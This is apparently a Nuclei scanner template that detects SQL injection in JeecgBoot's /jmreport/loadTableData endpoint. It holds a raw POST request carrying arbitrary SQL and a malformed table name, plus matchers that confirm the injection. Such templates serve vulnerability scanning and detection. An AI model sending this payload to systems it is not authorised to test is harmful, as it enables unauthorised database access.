id: jeecg-boot-jmreport-loadTableData-sqli

info:
  name: jeecg-boot-jmreport-loadTableData-sqli
  author: JeecgBoot
  severity: high
  tags: JeecgBoot, sqli

http:
  - raw:
      - |
        POST /jmreport/loadTableData HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0
        Accept: application/json, text/plain, */*
        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
        Accept-Encoding: gzip, deflate
        Content-Type: application/json;charset=UTF-8
        Connection: close

        {"dbSource":"","sql":"select database()","tableName":"test_demo);","pageNo":1,"pageSize":10}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "\"database()\":")'
        condition: and

